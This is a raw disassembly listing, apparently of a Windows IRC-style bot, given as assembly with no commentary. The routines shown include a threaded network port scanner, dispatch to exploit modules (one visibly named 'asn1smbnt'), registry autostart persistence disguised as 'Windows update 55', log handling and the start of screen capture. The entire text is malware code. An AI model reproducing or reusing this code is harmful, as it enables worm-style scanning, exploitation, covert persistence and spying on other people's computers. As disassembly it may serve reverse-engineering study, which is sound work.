loc_402DEB: ; CODE XREF: sub_402D70+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4443B8[ecx*8], eax
loc_402E09: ; CODE XREF: sub_402D70+26�j
pop esi
leave
retn
sub_402D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E0C proc near ; CODE XREF: sub_403076+B8�p
; sub_4064A6+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_44B740 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_402E35
xor eax, eax
jmp short loc_402EA4
; ---------------------------------------------------------------------------
loc_402E35: ; CODE XREF: sub_402E0C+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_44B6C0 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_44B75C ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_44B668 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_44B6A8 ; select
push esi
mov edi, eax
call dword_44B758 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_402EA4: ; CODE XREF: sub_402E0C+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_402E0C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10110h
call sub_418D40
push ebx
push esi
push edi
mov edi, 2649h
push edi
call dword_44B6C0 ; htons
push dword ptr [ebp+10h]
mov [ebp-28h], ax
call dword_44B6C0 ; htons
mov [ebp-26h], ax
call sub_419000
xor ebx, ebx
push 200h
mov [ebp-24h], eax
mov [ebp-20h], ebx
mov [ebp-1Ch], bx
mov [ebp-0Ch], bx
mov word ptr [ebp-1Ah], 5
mov [ebp-18h], bx
mov word ptr [ebp-16h], 1
mov [ebp-14h], bx
mov [ebp-12h], bx
mov [ebp-10h], bx
mov [ebp-0Eh], bx
call dword_44B6C0 ; htons
mov esi, [ebp+0Ch]
mov [ebp-0Ah], ax
mov eax, [ebp+8]
push 24h
mov [ebp-8], bx
mov [ebp-6], bx
mov [ebp-58h], eax
mov [ebp-54h], esi
mov [ebp-50h], bl
mov byte ptr [ebp-4Fh], 6
call dword_44B6C0 ; htons
mov [ebp-4Eh], ax
lea eax, [ebp-28h]
push 24h
push eax
lea eax, [ebp-4Ch]
push eax
call sub_418A00
lea eax, [ebp-58h]
push 20h
push eax
call sub_40B045
mov [ebp-8], ax
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call sub_4189A0
add esp, 20h
mov word ptr [ebp-38h], 2
push dword ptr [ebp+10h]
call dword_44B6C0 ; htons
push 6
push 3
push 2
mov [ebp-36h], ax
mov [ebp-34h], esi
mov dword ptr [ebp-4], 10h
call dword_44B740 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_402FA8
push offset aSocketOpenFail ; "socket open failed"
jmp loc_403069
; ---------------------------------------------------------------------------
loc_402FA8: ; CODE XREF: .text:00402F9C�j
push dword ptr [ebp-4]
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-28h]
push 24h
push eax
push esi
call dword_44B724 ; sendto
cmp eax, 14h
mov [ebp+10h], eax
jz short loc_402FF1
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp-0D8h]
push dword ptr [ebp+10h]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
push eax
call sub_418D70
lea eax, [ebp-0D8h]
push eax
call sub_4035E1
add esp, 14h
jmp short loc_40303A
; ---------------------------------------------------------------------------
loc_402FF1: ; CODE XREF: .text:00402FC3�j
push 10038h
lea eax, [ebp-10110h]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
loc_403006: ; CODE XREF: .text:0040302D�j
cmp [ebp-100FAh], di
jz short loc_403043
lea eax, [ebp-4]
push eax
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-10110h]
push 10038h
push eax
push esi
call dword_44B698 ; recvfrom
test eax, eax
jge short loc_403006
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_4035E1
pop ecx
loc_40303A: ; CODE XREF: .text:00402FEF�j
push esi
call dword_44B758 ; closesocket
jmp short loc_40306F
; ---------------------------------------------------------------------------
loc_403043: ; CODE XREF: .text:0040300D�j
push esi
call dword_44B758 ; closesocket
cmp word ptr [ebp-100EAh], 1
jnz short loc_403064
push offset aSocketOpen_ ; "Socket open."
call sub_4035E1
pop ecx
push 1
pop eax
jmp short loc_403071
; ---------------------------------------------------------------------------
loc_403064: ; CODE XREF: .text:00403052�j
push offset aSocketClosed_ ; "Socket closed."
loc_403069: ; CODE XREF: .text:00402FA3�j
call sub_4035E1
pop ecx
loc_40306F: ; CODE XREF: .text:00403041�j
xor eax, eax
loc_403071: ; CODE XREF: .text:00403062�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403076 proc near ; DATA XREF: sub_40328A+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_494308
push eax
call sub_418FF0
mov ebx, esi
pop ecx
imul ebx, 234h
loc_4030BD: ; CODE XREF: sub_403076+200�j
mov eax, dword_44D05C[ebx]
cmp dword_4443BC[eax*8], 0
jz loc_40327B
cmp [ebp+var_10], 0
push eax
jz short loc_4030E7
lea eax, [ebp+var_150]
push eax
call sub_402D70
pop ecx
jmp short loc_4030EC
; ---------------------------------------------------------------------------
loc_4030E7: ; CODE XREF: sub_403076+60�j
call sub_402D28
loc_4030EC: ; CODE XREF: sub_403076+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_44D05C[ebx]
push [ebp+var_3C]
push edi
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_418D70
lea eax, [ebp+var_28C]
push eax
lea eax, dword_44CE58[ebx]
push eax
call sub_418D70
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_402E0C
add esp, 2Ch
cmp eax, 1
jnz loc_40326B
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4031C0
push offset dword_445358
call ds:dword_494304
push [ebp+var_3C]
push edi
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_418D70
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4031A2
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_403196
lea eax, [ebp+var_140]
loc_403196: ; CODE XREF: sub_403076+118�j
push eax
push [ebp+var_40]
call sub_40842D
add esp, 14h
loc_4031A2: ; CODE XREF: sub_403076+FD�j
lea eax, [ebp+var_28C]
push eax
call sub_4035E1
mov [esp+2A8h+var_2A8], offset dword_445358
call ds:dword_494300
jmp loc_40326B
; ---------------------------------------------------------------------------
loc_4031C0: ; CODE XREF: sub_403076+CD�j
push edi
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_418D70
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aAsn1smbnt ; "asn1smbnt"
push eax
lea eax, [ebp+var_178]
push eax
call sub_418D70
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_403204
lea eax, [ebp+var_140]
loc_403204: ; CODE XREF: sub_403076+186�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_418D70
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call off_43615C[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40326B: ; CODE XREF: sub_403076+C3�j
; sub_403076+145�j
push 7D0h
call ds:dword_4942D8
jmp loc_4030BD
; ---------------------------------------------------------------------------
loc_40327B: ; CODE XREF: sub_403076+55�j
push esi
call sub_416507
pop ecx
push 0
call ds:dword_4942FC
sub_403076 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40328A proc near ; DATA XREF: sub_40C50A+3310�o
; sub_40C50A+513B�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_44B700 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_4443B8[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_402994
push 8
call sub_416433
add esp, 150h
cmp eax, ebx
jnz short loc_403358
mov esi, offset dword_445358
push esi
call ds:dword_494310
push 80000400h
push esi
call ds:dword_49430C
test eax, eax
jnz short loc_403358
lea eax, [ebp+var_1CC]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_418D70
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_403342
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40842D
add esp, 14h
loc_403342: ; CODE XREF: sub_40328A+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_4035E1
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_403358: ; CODE XREF: sub_40328A+63�j
; sub_40328A+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_4942D8
mov edi, ebx
mov dword_4443BC[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_403425
loc_403376: ; CODE XREF: sub_40328A+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_4161EB
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_44D05C[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_403076
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4033F0
loc_4033E5: ; CODE XREF: sub_40328A+164�j
cmp [ebp+var_4], ebx
jnz short loc_403417
push 1Eh
call esi
jmp short loc_4033E5
; ---------------------------------------------------------------------------
loc_4033F0: ; CODE XREF: sub_40328A+159�j
call ds:dword_4942F0
push eax
lea eax, [ebp+var_1CC]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_418D70
lea eax, [ebp+var_1CC]
push eax
call sub_4035E1
add esp, 10h
loc_403417: ; CODE XREF: sub_40328A+15E�j
push 1Eh
call esi
inc edi
cmp edi, [ebp+var_20]
jbe loc_403376
loc_403425: ; CODE XREF: sub_40328A+E6�j
cmp [ebp+var_30], ebx
jz loc_4034CF
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi
loc_40343A: ; CODE XREF: sub_40328A+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4443B8[eax*8]
push eax
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_418D70
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_403488
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40842D
add esp, 14h
loc_403488: ; CODE XREF: sub_40328A+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_4035E1
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_4443BC[eax*8], ebx
call esi
push 8
call sub_416433
cmp eax, 1
pop ecx
jnz short loc_4034BF
push offset dword_445358
call ds:dword_494310
loc_4034BF: ; CODE XREF: sub_40328A+228�j
push [ebp+var_2C]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_4034CF: ; CODE XREF: sub_40328A+19E�j
; sub_40328A+25D�j
mov eax, [ebp+var_2C]
cmp dword_4443BC[eax*8], 1
jnz loc_40343A
push 7D0h
call esi
jmp short loc_4034CF
sub_40328A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034E9 proc near ; CODE XREF: sub_40C50A+44AC�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_44C2D8
mov edi, 0B8h
loc_4034FD: ; CODE XREF: sub_4034E9+33�j
cmp byte ptr [esi], 0
jz short loc_403520
push [ebp+arg_0]
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_403520
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_44CE58
jl short loc_4034FD
jmp short loc_403562
; ---------------------------------------------------------------------------
loc_403520: ; CODE XREF: sub_4034E9+17�j
; sub_4034E9+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_44C2D8[esi]
push ebx
call sub_4189A0
push 17h
push [ebp+arg_0]
push ebx
call sub_4191A0
push 9Fh
lea eax, dword_44C2F0[esi]
push [ebp+arg_4]
push eax
call sub_4191A0
add esp, 24h
inc dword_43E5BC
pop ebx
loc_403562: ; CODE XREF: sub_4034E9+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_4034E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403569 proc near ; CODE XREF: sub_40C50A+5B4C�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
xor edi, edi
mov esi, offset dword_44C2D8
loc_403593: ; CODE XREF: sub_403569+72�j
cmp byte ptr [esi], 0
jz short loc_4035CE
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_418EF0
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 2Ch
loc_4035CE: ; CODE XREF: sub_403569+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_44CE58
jl short loc_403593
pop edi
pop esi
leave
retn
sub_403569 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035E1 proc near ; CODE XREF: sub_4013F1+323�p
; .text:00401A19�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_494314
mov ebx, offset dword_449C70
mov edi, 80h
mov esi, offset dword_445C70
loc_403603: ; CODE XREF: sub_4035E1+3D�j
cmp byte ptr [ebx], 0
jz short loc_40361A
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_4191A0
add esp, 0Ch
loc_40361A: ; CODE XREF: sub_4035E1+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_403603
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_418EF0
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_4035E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403655 proc near ; CODE XREF: sub_40C22A+F7�p
; sub_40C50A:loc_410739�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_4193F0
lea eax, [ebp+var_80]
push eax
call sub_4035E1
add esp, 14h
leave
retn
sub_403655 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+14h], ebx
push esi
mov dword ptr [ebp-8], 80h
mov [ebp-4], ebx
jnz short loc_4036B0
push ebx
push dword ptr [ebp+10h]
push offset aLogs ; "-[Logs]-"
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40842D
add esp, 14h
loc_4036B0: ; CODE XREF: .text:00403697�j
cmp [ebp+18h], ebx
jz short loc_4036C8
push dword ptr [ebp+18h]
call sub_4195F0
cmp eax, ebx
pop ecx
mov [ebp-4], eax
jz short loc_4036C8
mov [ebp-8], eax
loc_4036C8: ; CODE XREF: .text:004036B3�j
; .text:004036C3�j
mov [ebp+14h], ebx
mov esi, offset dword_445C70
loc_4036D0: ; CODE XREF: .text:00403718�j
mov eax, [ebp+14h]
cmp eax, [ebp-8]
jge short loc_40371A
cmp [esi], bl
jz short loc_403709
cmp [ebp+18h], ebx
jz short loc_4036F5
cmp [ebp-4], ebx
jnz short loc_4036F5
push dword ptr [ebp+18h]
push esi
call sub_4099DA
pop ecx
test eax, eax
pop ecx
jz short loc_403709
loc_4036F5: ; CODE XREF: .text:004036DF�j
; .text:004036E4�j
push 1
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40842D
add esp, 14h
loc_403709: ; CODE XREF: .text:004036DA�j
; .text:004036F3�j
inc dword ptr [ebp+14h]
add esi, 80h
cmp esi, offset dword_449C70
jl short loc_4036D0
loc_40371A: ; CODE XREF: .text:004036D6�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40371E proc near ; CODE XREF: sub_40C50A+5A43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_445C70
xor ecx, ecx
loc_403725: ; CODE XREF: sub_40371E+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_449C70
jl short loc_403725
cmp [esp+arg_C], ecx
jnz short loc_403753
push ecx
push [esp+4+arg_8]
push offset aLogsCleared_ ; "[LOGS]: Cleared."
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40842D
add esp, 14h
loc_403753: ; CODE XREF: sub_40371E+19�j
push offset aLogsCleared__0 ; "[LOGS]: Cleared."
call sub_4035E1
pop ecx
retn
sub_40371E endp
; =============== S U B R O U T I N E =======================================
sub_40375F proc near ; CODE XREF: sub_4013F1+2B3�p
; .text:004019A9�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_445C70
loc_403765: ; CODE XREF: sub_40375F+27�j
cmp byte ptr [esi], 0
jz short loc_40377A
push [esp+4+arg_0]
push esi
call sub_4099DA
pop ecx
test eax, eax
pop ecx
jnz short loc_40378C
loc_40377A: ; CODE XREF: sub_40375F+9�j
add esi, 80h
cmp esi, offset dword_449C70
jl short loc_403765
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40378C: ; CODE XREF: sub_40375F+19�j
push 1
pop eax
pop esi
retn
sub_40375F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403791 proc near ; DATA XREF: sub_40C50A+5AF6�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_4037E4
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_40842D
add esp, 14h
loc_4037E4: ; CODE XREF: sub_403791+33�j
cmp [ebp+var_98], 0
jz short loc_403804
lea eax, [ebp+var_98]
push eax
call sub_4195F0
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_403804
mov [ebp+var_8], eax
loc_403804: ; CODE XREF: sub_403791+5A�j
; sub_403791+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_445C70
loc_40380D: ; CODE XREF: sub_403791+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_403867
cmp byte ptr [esi], 0
jz short loc_403856
cmp [ebp+var_98], 0
jz short loc_40383C
cmp [ebp+var_4], 0
jnz short loc_40383C
lea eax, [ebp+var_98]
push eax
push esi
call sub_4099DA
pop ecx
test eax, eax
pop ecx
jz short loc_403856
loc_40383C: ; CODE XREF: sub_403791+90�j
; sub_403791+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40842D
add esp, 14h
loc_403856: ; CODE XREF: sub_403791+87�j
; sub_403791+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_449C70
jl short loc_40380D
loc_403867: ; CODE XREF: sub_403791+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_418D70
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_4038A1
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40842D
add esp, 14h
loc_4038A1: ; CODE XREF: sub_403791+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_4035E1
push [ebp+var_18]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
sub_403791 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038C0 proc near ; CODE XREF: sub_403930+4�p
; sub_409D2E+1E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_4368D0
xor esi, esi
mov ebx, offset aWindowsUpdate5 ; "Windows update 55"
loc_4038D3: ; CODE XREF: sub_4038C0+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_44B674 ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40390D
push [ebp+arg_0]
call sub_418E70
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_44B6E4 ; RegSetValueExA
jmp short loc_403917
; ---------------------------------------------------------------------------
loc_40390D: ; CODE XREF: sub_4038C0+2F�j
push ebx
push [ebp+var_4]
call dword_44B62C ; RegDeleteValueA
loc_403917: ; CODE XREF: sub_4038C0+4B�j
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
add edi, 8
cmp edi, offset aDisplay ; "DISPLAY"
jl short loc_4038D3
pop edi
pop esi
pop ebx
leave
retn
sub_4038C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403930 proc near ; CODE XREF: sub_403930+16�j
; DATA XREF: sub_40BBCB+43D�o
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4038C0
pop ecx
push dword_4368C8
call ds:dword_4942D8
jmp short sub_403930
sub_403930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403948 proc near ; CODE XREF: sub_40C50A+45CD�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_44B6AC ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_403B7C
push 8
push edi
call dword_44B6C8 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call dword_44B6C8 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call dword_44B6C8 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_4039AA
push 18h
push edi
call dword_44B6C8 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_4039AC
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_403948+50�j
xor ebx, ebx
loc_4039AC: ; CODE XREF: sub_403948+60�j
push edi
call dword_44B70C ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_403B61
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call dword_44B704 ; CreateDIBSection
cmp eax, esi
